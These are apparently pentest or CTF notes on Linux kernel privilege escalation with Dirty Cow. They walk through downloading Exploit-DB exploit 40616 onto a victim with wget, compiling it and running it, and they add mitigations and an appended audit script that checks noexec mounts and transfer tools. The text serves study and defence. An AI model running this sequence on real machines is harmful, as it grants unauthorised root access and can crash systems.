Kernel Exploits

Dirty Cow!

Enumeration

Enumerate the kernel version and search for known exploits against it:

uname -a

Or, transfer linux-exploit-suggester.sh to the victim machine and run it. If the keyword "dirtycow" is in the output, try it.

Dirty Cow

Dirty Cow is the most commonly used kernel exploit in CTF-like environments. The downside is that a failed Dirty Cow attack may crash the victim machine, which is really bad in a real-world pentest scenario.

Quote from the original bug report:

A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.

Suppose we want to use exploit 40616 from Exploit-DB. On the victim machine, change to the /tmp directory:

cd /tmp

Download it:

wget https://www.exploit-db.com/download/40616 -O cowroot.c

Following the instructions in the source comments, uncomment one of the payloads and compile it:

gcc cowroot.c -o cowroot -pthread

Execute the exploit:

./cowroot

Make the shell more stable:

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

Cheat Code: Ubuntu 16.04 Privesc

Many Linux machines are vulnerable to this kernel exploit, so I call it the "cheat code" in Linux privilege escalation.

This kernel exploit works smoothly for many boxes:

Ubuntu 16.04 local privesc

Mitigation

A successful privilege escalation through a kernel exploit requires the following 5 conditions:

  1. A vulnerable kernel

  2. A working exploit

  3. A way to transfer the exploit to the target

  4. A way to compile the exploit (optional since some exploits can be compiled on the attack machine)

  5. A way to execute the exploit

Conditions 1 and 2 are hard to prevent, hence we should focus on conditions 3, 4, and 5. The mitigation ideas are:

  • Prevent transferring the exploit

    • Do not allow users to use FTP, TFTP, SMB, SCP, wget, and curl

  • Remove compilation tools

    • Remove GCC, CC, and other development tools.

  • Prevent exploit execution

    • Mount directories such as /tmp and /home on a separate file system mounted with the noexec option.

    • For existing executables, run chmod 700 <executable> so that only the owner can execute it, if you don't want other users to run it.
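As an added example (not part of the original page), the following POSIX shell script audits a host against the three mitigation ideas listed above: whether /tmp and /home are mounted noexec, and whether compilers or file-transfer tools are reachable on PATH. The mount check parses /proc/mounts-formatted lines from stdin and the tool check takes an explicit search path, so both can be tried on constructed sample data; the sample mount lines and the tool lists are assumptions chosen for illustration, not values from the page.

```shell
#!/bin/sh
# Added example, not from the original page: audit a host for the kernel
# exploit mitigations (noexec /tmp and /home, no compilers, no transfer tools).

# Usage: mount_is_noexec MOUNTPOINT < /proc/mounts
# Returns 0 when MOUNTPOINT appears in the input and its option list
# (field 4) contains "noexec"; returns 1 if it is absent or executable.
mount_is_noexec() {
    awk -v t="$1" '
        $2 == t { seen = 1; if ($4 ~ /(^|,)noexec(,|$)/) hardened = 1 }
        END { if (seen && hardened) exit 0; exit 1 }'
}

# Usage: tools_found SEARCHPATH tool...
# Prints every listed tool that exists as an executable regular file in one
# of the colon-separated SEARCHPATH directories. Returns 0 when none were
# found (mitigation in place) and 1 when at least one was found.
tools_found() {
    search="$1"; shift
    hits=0
    for tool in "$@"; do
        old_ifs=$IFS; IFS=:
        for dir in $search; do
            if [ -f "$dir/$tool" ] && [ -x "$dir/$tool" ]; then
                echo "$tool: $dir/$tool"
                hits=1
                break
            fi
        done
        IFS=$old_ifs
    done
    return $hits
}

# Run the checks against the live system and print a short report.
# Returns 0 only when every check passes.
audit_host() {
    rc=0
    for mp in /tmp /home; do
        if mount_is_noexec "$mp" < /proc/mounts; then
            echo "OK   $mp is mounted noexec"
        else
            echo "WARN $mp is not a separate noexec mount"
            rc=1
        fi
    done
    echo "Compilers on PATH (assumed list):"
    tools_found "$PATH" gcc cc g++ clang tcc || rc=1
    echo "Transfer tools on PATH (assumed list):"
    tools_found "$PATH" wget curl ftp tftp scp smbclient || rc=1
    return $rc
}

# Constructed sample /proc/mounts lines for trying the parser offline:
# /tmp is hardened, /home is not.
SAMPLE_MOUNTS='tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda2 /home ext4 rw,relatime 0 0
/dev/sda1 / ext4 rw,relatime 0 0'

# Only audit the live host when explicitly asked, e.g. ./audit.sh --live
if [ "${1:-}" = "--live" ]; then
    audit_host
fi
```

Run it with --live to report on the current host, or source it and feed the sample lines to mount_is_noexec to see how the parser treats a hardened versus an executable mount. A non-zero exit from audit_host means at least one of the three mitigations is missing.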
